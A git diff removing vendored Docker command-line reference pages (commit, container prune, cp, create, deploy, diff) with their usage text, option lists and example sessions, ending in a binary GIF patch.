-`tls//ca.crt` in your docker config directory. - -Alternatively you can trust the certificate globally by adding it to your system's -list of root Certificate Authorities. - -## Help - -To list the help on any command just execute the command, followed by the -`--help` option. - - $ docker run --help - - Usage: docker run [OPTIONS] IMAGE [COMMAND] [ARG...] - - Run a command in a new container - - Options: - --add-host value Add a custom host-to-IP mapping (host:ip) (default []) - -a, --attach value Attach to STDIN, STDOUT or STDERR (default []) - ... - -## Option types - -Single character command line options can be combined, so rather than -typing `docker run -i -t --name test busybox sh`, -you can write `docker run -it --name test busybox sh`. - -### Boolean - -Boolean options take the form `-d=false`. The value you see in the help text is -the default value which is set if you do **not** specify that flag. If you -specify a Boolean flag without a value, this will set the flag to `true`, -irrespective of the default value. - -For example, running `docker run -d` will set the value to `true`, so your -container **will** run in "detached" mode, in the background. - -Options which default to `true` (e.g., `docker build --rm=true`) can only be -set to the non-default value by explicitly setting them to `false`: - - $ docker build --rm=false . - -### Multi - -You can specify options like `-a=[]` multiple times in a single command line, -for example in these commands: - - $ docker run -a stdin -a stdout -i -t ubuntu /bin/bash - $ docker run -a stdin -a stdout -a stderr ubuntu /bin/ls - -Sometimes, multiple options can call for a more complex value string as for -`-v`: - - $ docker run -v /host:/container example/mysql - -> **Note:** -> Do not use the `-t` and `-a stderr` options together due to -> limitations in the `pty` implementation. All `stderr` in `pty` mode -> simply goes to `stdout`. - -### Strings and Integers - -Options like `--name=""` expect a string, and they -can only be specified once. Options like `-c=0` -expect an integer, and they can only be specified once. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/commit.md b/vendor/github.com/docker/docker/docs/reference/commandline/commit.md deleted file mode 100644 index 8f971a5d95..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/commit.md +++ /dev/null @@ -1,93 +0,0 @@ ---- -title: "commit" -description: "The commit command description and usage" -keywords: "commit, file, changes" ---- - - - -# commit - -```markdown -Usage: docker commit [OPTIONS] CONTAINER [REPOSITORY[:TAG]] - -Create a new image from a container's changes - -Options: - -a, --author string Author (e.g., "John Hannibal Smith ") - -c, --change value Apply Dockerfile instruction to the created image (default []) - --help Print usage - -m, --message string Commit message - -p, --pause Pause container during commit (default true) -``` - -It can be useful to commit a container's file changes or settings into a new -image. This allows you debug a container by running an interactive shell, or to -export a working dataset to another server. Generally, it is better to use -Dockerfiles to manage your images in a documented and maintainable way. -[Read more about valid image names and tags](tag.md). - -The commit operation will not include any data contained in -volumes mounted inside the container. - -By default, the container being committed and its processes will be paused -while the image is committed. This reduces the likelihood of encountering data -corruption during the process of creating the commit. If this behavior is -undesired, set the `--pause` option to false. - -The `--change` option will apply `Dockerfile` instructions to the image that is -created. Supported `Dockerfile` instructions: -`CMD`|`ENTRYPOINT`|`ENV`|`EXPOSE`|`LABEL`|`ONBUILD`|`USER`|`VOLUME`|`WORKDIR` - -## Commit a container - - $ docker ps - ID IMAGE COMMAND CREATED STATUS PORTS - c3f279d17e0a ubuntu:12.04 /bin/bash 7 days ago Up 25 hours - 197387f1b436 ubuntu:12.04 /bin/bash 7 days ago Up 25 hours - $ docker commit c3f279d17e0a svendowideit/testimage:version3 - f5283438590d - $ docker images - REPOSITORY TAG ID CREATED SIZE - svendowideit/testimage version3 f5283438590d 16 seconds ago 335.7 MB - -## Commit a container with new configurations - - {% raw %} - $ docker ps - ID IMAGE COMMAND CREATED STATUS PORTS - c3f279d17e0a ubuntu:12.04 /bin/bash 7 days ago Up 25 hours - 197387f1b436 ubuntu:12.04 /bin/bash 7 days ago Up 25 hours - $ docker inspect -f "{{ .Config.Env }}" c3f279d17e0a - [HOME=/ PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin] - $ docker commit --change "ENV DEBUG true" c3f279d17e0a svendowideit/testimage:version3 - f5283438590d - $ docker inspect -f "{{ .Config.Env }}" f5283438590d - [HOME=/ PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin DEBUG=true] - {% endraw %} - -## Commit a container with new `CMD` and `EXPOSE` instructions - - $ docker ps - ID IMAGE COMMAND CREATED STATUS PORTS - c3f279d17e0a ubuntu:12.04 /bin/bash 7 days ago Up 25 hours - 197387f1b436 ubuntu:12.04 /bin/bash 7 days ago Up 25 hours - - $ docker commit --change='CMD ["apachectl", "-DFOREGROUND"]' -c "EXPOSE 80" c3f279d17e0a svendowideit/testimage:version4 - f5283438590d - - $ docker run -d svendowideit/testimage:version4 - 89373736e2e7f00bc149bd783073ac43d0507da250e999f3f1036e0db60817c0 - - $ docker ps - ID IMAGE COMMAND CREATED STATUS PORTS - 89373736e2e7 testimage:version4 "apachectl -DFOREGROU" 3 seconds ago Up 2 seconds 80/tcp - c3f279d17e0a ubuntu:12.04 /bin/bash 7 days ago Up 25 hours - 197387f1b436 ubuntu:12.04 /bin/bash 7 days ago Up 25 hours diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/container_prune.md b/vendor/github.com/docker/docker/docs/reference/commandline/container_prune.md deleted file mode 100644 index 43156406ec..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/container_prune.md +++ /dev/null @@ -1,47 +0,0 @@ ---- -title: "container prune" -description: "Remove all stopped containers" -keywords: container, prune, delete, remove ---- - - - -# container prune - -```markdown -Usage: docker container prune [OPTIONS] - -Remove all stopped containers - -Options: - -f, --force Do not prompt for confirmation - --help Print usage -``` - -## Examples - -```bash -$ docker container prune -WARNING! This will remove all stopped containers. -Are you sure you want to continue? [y/N] y -Deleted Containers: -4a7f7eebae0f63178aff7eb0aa39cd3f0627a203ab2df258c1a00b456cf20063 -f98f9c2aa1eaf727e4ec9c0283bc7d4aa4762fbdba7f26191f26c97f64090360 - -Total reclaimed space: 212 B -``` - -## Related information - -* [system df](system_df.md) -* [volume prune](volume_prune.md) -* [image prune](image_prune.md) -* [network prune](network_prune.md) -* [system prune](system_prune.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/cp.md b/vendor/github.com/docker/docker/docs/reference/commandline/cp.md deleted file mode 100644 index fcfd35fce1..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/cp.md +++ /dev/null @@ -1,112 +0,0 @@ ---- -title: "cp" -description: "The cp command description and usage" -keywords: "copy, container, files, folders" ---- - - - -# cp - -```markdown -Usage: docker cp [OPTIONS] CONTAINER:SRC_PATH DEST_PATH|- - docker cp [OPTIONS] SRC_PATH|- CONTAINER:DEST_PATH - -Copy files/folders between a container and the local filesystem - -Use '-' as the source to read a tar archive from stdin -and extract it to a directory destination in a container. -Use '-' as the destination to stream a tar archive of a -container source to stdout. - -Options: - -L, --follow-link Always follow symbol link in SRC_PATH - --help Print usage -``` - -The `docker cp` utility copies the contents of `SRC_PATH` to the `DEST_PATH`. -You can copy from the container's file system to the local machine or the -reverse, from the local filesystem to the container. If `-` is specified for -either the `SRC_PATH` or `DEST_PATH`, you can also stream a tar archive from -`STDIN` or to `STDOUT`. The `CONTAINER` can be a running or stopped container. -The `SRC_PATH` or `DEST_PATH` can be a file or directory. - -The `docker cp` command assumes container paths are relative to the container's -`/` (root) directory. This means supplying the initial forward slash is optional; -The command sees `compassionate_darwin:/tmp/foo/myfile.txt` and -`compassionate_darwin:tmp/foo/myfile.txt` as identical. Local machine paths can -be an absolute or relative value. The command interprets a local machine's -relative paths as relative to the current working directory where `docker cp` is -run. - -The `cp` command behaves like the Unix `cp -a` command in that directories are -copied recursively with permissions preserved if possible. Ownership is set to -the user and primary group at the destination. For example, files copied to a -container are created with `UID:GID` of the root user. Files copied to the local -machine are created with the `UID:GID` of the user which invoked the `docker cp` -command. If you specify the `-L` option, `docker cp` follows any symbolic link -in the `SRC_PATH`. `docker cp` does *not* create parent directories for -`DEST_PATH` if they do not exist. - -Assuming a path separator of `/`, a first argument of `SRC_PATH` and second -argument of `DEST_PATH`, the behavior is as follows: - -- `SRC_PATH` specifies a file - - `DEST_PATH` does not exist - - the file is saved to a file created at `DEST_PATH` - - `DEST_PATH` does not exist and ends with `/` - - Error condition: the destination directory must exist. - - `DEST_PATH` exists and is a file - - the destination is overwritten with the source file's contents - - `DEST_PATH` exists and is a directory - - the file is copied into this directory using the basename from - `SRC_PATH` -- `SRC_PATH` specifies a directory - - `DEST_PATH` does not exist - - `DEST_PATH` is created as a directory and the *contents* of the source - directory are copied into this directory - - `DEST_PATH` exists and is a file - - Error condition: cannot copy a directory to a file - - `DEST_PATH` exists and is a directory - - `SRC_PATH` does not end with `/.` - - the source directory is copied into this directory - - `SRC_PATH` does end with `/.` - - the *content* of the source directory is copied into this - directory - -The command requires `SRC_PATH` and `DEST_PATH` to exist according to the above -rules. If `SRC_PATH` is local and is a symbolic link, the symbolic link, not -the target, is copied by default. To copy the link target and not the link, specify -the `-L` option. - -A colon (`:`) is used as a delimiter between `CONTAINER` and its path. You can -also use `:` when specifying paths to a `SRC_PATH` or `DEST_PATH` on a local -machine, for example `file:name.txt`. If you use a `:` in a local machine path, -you must be explicit with a relative or absolute path, for example: - - `/path/to/file:name.txt` or `./file:name.txt` - -It is not possible to copy certain system files such as resources under -`/proc`, `/sys`, `/dev`, [tmpfs](run.md#mount-tmpfs-tmpfs), and mounts created by -the user in the container. However, you can still copy such files by manually -running `tar` in `docker exec`. For example (consider `SRC_PATH` and `DEST_PATH` -are directories): - - $ docker exec foo tar Ccf $(dirname SRC_PATH) - $(basename SRC_PATH) | tar Cxf DEST_PATH - - -or - - $ tar Ccf $(dirname SRC_PATH) - $(basename SRC_PATH) | docker exec -i foo tar Cxf DEST_PATH - - - -Using `-` as the `SRC_PATH` streams the contents of `STDIN` as a tar archive. -The command extracts the content of the tar to the `DEST_PATH` in container's -filesystem. In this case, `DEST_PATH` must specify a directory. Using `-` as -the `DEST_PATH` streams the contents of the resource as a tar archive to `STDOUT`. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/create.md b/vendor/github.com/docker/docker/docs/reference/commandline/create.md deleted file mode 100644 index e6582e4a38..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/create.md +++ /dev/null @@ -1,211 +0,0 @@ ---- -title: "create" -description: "The create command description and usage" -keywords: "docker, create, container" ---- - - - -# create - -Creates a new container. - -```markdown -Usage: docker create [OPTIONS] IMAGE [COMMAND] [ARG...] - -Create a new container - -Options: - --add-host value Add a custom host-to-IP mapping (host:ip) (default []) - -a, --attach value Attach to STDIN, STDOUT or STDERR (default []) - --blkio-weight value Block IO (relative weight), between 10 and 1000 - --blkio-weight-device value Block IO weight (relative device weight) (default []) - --cap-add value Add Linux capabilities (default []) - --cap-drop value Drop Linux capabilities (default []) - --cgroup-parent string Optional parent cgroup for the container - --cidfile string Write the container ID to the file - --cpu-count int The number of CPUs available for execution by the container. - Windows daemon only. On Windows Server containers, this is - approximated as a percentage of total CPU usage. - --cpu-percent int CPU percent (Windows only) - --cpu-period int Limit CPU CFS (Completely Fair Scheduler) period - --cpu-quota int Limit CPU CFS (Completely Fair Scheduler) quota - -c, --cpu-shares int CPU shares (relative weight) - --cpus NanoCPUs Number of CPUs (default 0.000) - --cpu-rt-period int Limit the CPU real-time period in microseconds - --cpu-rt-runtime int Limit the CPU real-time runtime in microseconds - --cpuset-cpus string CPUs in which to allow execution (0-3, 0,1) - --cpuset-mems string MEMs in which to allow execution (0-3, 0,1) - --device value Add a host device to the container (default []) - --device-read-bps value Limit read rate (bytes per second) from a device (default []) - --device-read-iops value Limit read rate (IO per second) from a device (default []) - --device-write-bps value Limit write rate (bytes per second) to a device (default []) - --device-write-iops value Limit write rate (IO per second) to a device (default []) - --disable-content-trust Skip image verification (default true) - --dns value Set custom DNS servers (default []) - --dns-option value Set DNS options (default []) - --dns-search value Set custom DNS search domains (default []) - --entrypoint string Overwrite the default ENTRYPOINT of the image - -e, --env value Set environment variables (default []) - --env-file value Read in a file of environment variables (default []) - --expose value Expose a port or a range of ports (default []) - --group-add value Add additional groups to join (default []) - --health-cmd string Command to run to check health - --health-interval duration Time between running the check (ns|us|ms|s|m|h) (default 0s) - --health-retries int Consecutive failures needed to report unhealthy - --health-timeout duration Maximum time to allow one check to run (ns|us|ms|s|m|h) (default 0s) - --help Print usage - -h, --hostname string Container host name - --init Run an init inside the container that forwards signals and reaps processes - --init-path string Path to the docker-init binary - -i, --interactive Keep STDIN open even if not attached - --io-maxbandwidth string Maximum IO bandwidth limit for the system drive (Windows only) - --io-maxiops uint Maximum IOps limit for the system drive (Windows only) - --ip string Container IPv4 address (e.g. 172.30.100.104) - --ip6 string Container IPv6 address (e.g. 2001:db8::33) - --ipc string IPC namespace to use - --isolation string Container isolation technology - --kernel-memory string Kernel memory limit - -l, --label value Set meta data on a container (default []) - --label-file value Read in a line delimited file of labels (default []) - --link value Add link to another container (default []) - --link-local-ip value Container IPv4/IPv6 link-local addresses (default []) - --log-driver string Logging driver for the container - --log-opt value Log driver options (default []) - --mac-address string Container MAC address (e.g. 92:d0:c6:0a:29:33) - -m, --memory string Memory limit - --memory-reservation string Memory soft limit - --memory-swap string Swap limit equal to memory plus swap: '-1' to enable unlimited swap - --memory-swappiness int Tune container memory swappiness (0 to 100) (default -1) - --name string Assign a name to the container - --network-alias value Add network-scoped alias for the container (default []) - --network string Connect a container to a network (default "default") - 'bridge': create a network stack on the default Docker bridge - 'none': no networking - 'container:': reuse another container's network stack - 'host': use the Docker host network stack - '|': connect to a user-defined network - --no-healthcheck Disable any container-specified HEALTHCHECK - --oom-kill-disable Disable OOM Killer - --oom-score-adj int Tune host's OOM preferences (-1000 to 1000) - --pid string PID namespace to use - --pids-limit int Tune container pids limit (set -1 for unlimited), kernel >= 4.3 - --privileged Give extended privileges to this container - -p, --publish value Publish a container's port(s) to the host (default []) - -P, --publish-all Publish all exposed ports to random ports - --read-only Mount the container's root filesystem as read only - --restart string Restart policy to apply when a container exits (default "no") - Possible values are: no, on-failure[:max-retry], always, unless-stopped - --rm Automatically remove the container when it exits - --runtime string Runtime to use for this container - --security-opt value Security Options (default []) - --shm-size string Size of /dev/shm, default value is 64MB. - The format is ``. `number` must be greater than `0`. - Unit is optional and can be `b` (bytes), `k` (kilobytes), `m` (megabytes), - or `g` (gigabytes). If you omit the unit, the system uses bytes. - --stop-signal string Signal to stop a container, SIGTERM by default (default "SIGTERM") - --stop-timeout=10 Timeout (in seconds) to stop a container - --storage-opt value Storage driver options for the container (default []) - --sysctl value Sysctl options (default map[]) - --tmpfs value Mount a tmpfs directory (default []) - -t, --tty Allocate a pseudo-TTY - --ulimit value Ulimit options (default []) - -u, --user string Username or UID (format: [:]) - --userns string User namespace to use - 'host': Use the Docker host user namespace - '': Use the Docker daemon user namespace specified by `--userns-remap` option. - --uts string UTS namespace to use - -v, --volume value Bind mount a volume (default []). The format - is `[host-src:]container-dest[:]`. - The comma-delimited `options` are [rw|ro], - [z|Z], [[r]shared|[r]slave|[r]private], and - [nocopy]. The 'host-src' is an absolute path - or a name value. - --volume-driver string Optional volume driver for the container - --volumes-from value Mount volumes from the specified container(s) (default []) - -w, --workdir string Working directory inside the container -``` - -The `docker create` command creates a writeable container layer over the -specified image and prepares it for running the specified command. The -container ID is then printed to `STDOUT`. This is similar to `docker run -d` -except the container is never started. You can then use the -`docker start ` command to start the container at any point. - -This is useful when you want to set up a container configuration ahead of time -so that it is ready to start when you need it. The initial status of the -new container is `created`. - -Please see the [run command](run.md) section and the [Docker run reference](../run.md) for more details. - -## Examples - - $ docker create -t -i fedora bash - 6d8af538ec541dd581ebc2a24153a28329acb5268abe5ef868c1f1a261221752 - $ docker start -a -i 6d8af538ec5 - bash-4.2# - -As of v1.4.0 container volumes are initialized during the `docker create` phase -(i.e., `docker run` too). For example, this allows you to `create` the `data` -volume container, and then use it from another container: - - $ docker create -v /data --name data ubuntu - 240633dfbb98128fa77473d3d9018f6123b99c454b3251427ae190a7d951ad57 - $ docker run --rm --volumes-from data ubuntu ls -la /data - total 8 - drwxr-xr-x 2 root root 4096 Dec 5 04:10 . - drwxr-xr-x 48 root root 4096 Dec 5 04:11 .. - -Similarly, `create` a host directory bind mounted volume container, which can -then be used from the subsequent container: - - $ docker create -v /home/docker:/docker --name docker ubuntu - 9aa88c08f319cd1e4515c3c46b0de7cc9aa75e878357b1e96f91e2c773029f03 - $ docker run --rm --volumes-from docker ubuntu ls -la /docker - total 20 - drwxr-sr-x 5 1000 staff 180 Dec 5 04:00 . - drwxr-xr-x 48 root root 4096 Dec 5 04:13 .. - -rw-rw-r-- 1 1000 staff 3833 Dec 5 04:01 .ash_history - -rw-r--r-- 1 1000 staff 446 Nov 28 11:51 .ashrc - -rw-r--r-- 1 1000 staff 25 Dec 5 04:00 .gitconfig - drwxr-sr-x 3 1000 staff 60 Dec 1 03:28 .local - -rw-r--r-- 1 1000 staff 920 Nov 28 11:51 .profile - drwx--S--- 2 1000 staff 460 Dec 5 00:51 .ssh - drwxr-xr-x 32 1000 staff 1140 Dec 5 04:01 docker - -Set storage driver options per container. - - $ docker create -it --storage-opt size=120G fedora /bin/bash - -This (size) will allow to set the container rootfs size to 120G at creation time. -This option is only available for the `devicemapper`, `btrfs`, `overlay2`, -`windowsfilter` and `zfs` graph drivers. -For the `devicemapper`, `btrfs`, `windowsfilter` and `zfs` graph drivers, -user cannot pass a size less than the Default BaseFS Size. -For the `overlay2` storage driver, the size option is only available if the -backing fs is `xfs` and mounted with the `pquota` mount option. -Under these conditions, user can pass any size less then the backing fs size. - -### Specify isolation technology for container (--isolation) - -This option is useful in situations where you are running Docker containers on -Windows. The `--isolation=` option sets a container's isolation -technology. On Linux, the only supported is the `default` option which uses -Linux namespaces. On Microsoft Windows, you can specify these values: - - -| Value | Description | -|-----------|---------------------------------------------------------------------------------------------------------------------------------------------------------------| -| `default` | Use the value specified by the Docker daemon's `--exec-opt` . If the `daemon` does not specify an isolation technology, Microsoft Windows uses `process` as its default value if the -daemon is running on Windows server, or `hyperv` if running on Windows client. | -| `process` | Namespace isolation only. | -| `hyperv` | Hyper-V hypervisor partition-based isolation. | - -Specifying the `--isolation` flag without a value is the same as setting `--isolation="default"`. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/deploy.md b/vendor/github.com/docker/docker/docs/reference/commandline/deploy.md deleted file mode 100644 index 53074b2fd4..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/deploy.md +++ /dev/null @@ -1,101 +0,0 @@ ---- -title: "deploy" -description: "The deploy command description and usage" -keywords: "stack, deploy" -advisory: "experimental" ---- - - - -# deploy (alias for stack deploy) (experimental) - -```markdown -Usage: docker deploy [OPTIONS] STACK - -Deploy a new stack or update an existing stack - -Aliases: - deploy, up - -Options: - --bundle-file string Path to a Distributed Application Bundle file - --compose-file string Path to a Compose file - --help Print usage - --with-registry-auth Send registry authentication details to Swarm agents -``` - -Create and update a stack from a `compose` or a `dab` file on the swarm. This command -has to be run targeting a manager node. - -## Compose file - -The `deploy` command supports compose file version `3.0` and above. - -```bash -$ docker stack deploy --compose-file docker-compose.yml vossibility -Ignoring unsupported options: links - -Creating network vossibility_vossibility -Creating network vossibility_default -Creating service vossibility_nsqd -Creating service vossibility_logstash -Creating service vossibility_elasticsearch -Creating service vossibility_kibana -Creating service vossibility_ghollector -Creating service vossibility_lookupd -``` - -You can verify that the services were correctly created - -``` -$ docker service ls -ID NAME MODE REPLICAS IMAGE -29bv0vnlm903 vossibility_lookupd replicated 1/1 nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662 -4awt47624qwh vossibility_nsqd replicated 1/1 nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662 -4tjx9biia6fs vossibility_elasticsearch replicated 1/1 elasticsearch@sha256:12ac7c6af55d001f71800b83ba91a04f716e58d82e748fa6e5a7359eed2301aa -7563uuzr9eys vossibility_kibana replicated 1/1 kibana@sha256:6995a2d25709a62694a937b8a529ff36da92ebee74bafd7bf00e6caf6db2eb03 -9gc5m4met4he vossibility_logstash replicated 1/1 logstash@sha256:2dc8bddd1bb4a5a34e8ebaf73749f6413c101b2edef6617f2f7713926d2141fe -axqh55ipl40h vossibility_vossibility-collector replicated 1/1 icecrime/vossibility-collector@sha256:f03f2977203ba6253988c18d04061c5ec7aab46bca9dfd89a9a1fa4500989fba -``` - -## DAB file - -```bash -$ docker stack deploy --bundle-file vossibility-stack.dab vossibility -Loading bundle from vossibility-stack.dab -Creating service vossibility_elasticsearch -Creating service vossibility_kibana -Creating service vossibility_logstash -Creating service vossibility_lookupd -Creating service vossibility_nsqd -Creating service vossibility_vossibility-collector -``` - -You can verify that the services were correctly created: - -```bash -$ docker service ls -ID NAME MODE REPLICAS IMAGE -29bv0vnlm903 vossibility_lookupd replicated 1/1 nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662 -4awt47624qwh vossibility_nsqd replicated 1/1 nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662 -4tjx9biia6fs vossibility_elasticsearch replicated 1/1 elasticsearch@sha256:12ac7c6af55d001f71800b83ba91a04f716e58d82e748fa6e5a7359eed2301aa -7563uuzr9eys vossibility_kibana replicated 1/1 kibana@sha256:6995a2d25709a62694a937b8a529ff36da92ebee74bafd7bf00e6caf6db2eb03 -9gc5m4met4he vossibility_logstash replicated 1/1 logstash@sha256:2dc8bddd1bb4a5a34e8ebaf73749f6413c101b2edef6617f2f7713926d2141fe -axqh55ipl40h vossibility_vossibility-collector replicated 1/1 icecrime/vossibility-collector@sha256:f03f2977203ba6253988c18d04061c5ec7aab46bca9dfd89a9a1fa4500989fba -``` - -## Related information - -* [stack config](stack_config.md) -* [stack deploy](stack_deploy.md) -* [stack ls](stack_ls.md) -* [stack ps](stack_ps.md) -* [stack rm](stack_rm.md) -* [stack services](stack_services.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/diff.md b/vendor/github.com/docker/docker/docs/reference/commandline/diff.md deleted file mode 100644 index be27678dcd..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/diff.md +++ /dev/null @@ -1,48 +0,0 @@ ---- -title: "diff" -description: "The diff command description and usage" -keywords: "list, changed, files, container" ---- - - - -# diff - -```markdown -Usage: docker diff CONTAINER - -Inspect changes on a container's filesystem - -Options: - --help Print usage -``` - -List the changed files and directories in a container᾿s filesystem. - There are 3 events that are listed in the `diff`: - -1. `A` - Add -2. `D` - Delete -3. `C` - Change - -For example: - - $ docker diff 7bb0e258aefe - - C /dev - A /dev/kmsg - C /etc - A /etc/mtab - A /go - A /go/src - A /go/src/github.com - A /go/src/github.com/docker - A /go/src/github.com/docker/docker - A /go/src/github.com/docker/docker/.git - .... diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/docker_images.gif b/vendor/github.com/docker/docker/docs/reference/commandline/docker_images.gif deleted file mode 100644 index 5894ca270e002758b8f332141e00356e42868880..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 35785 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 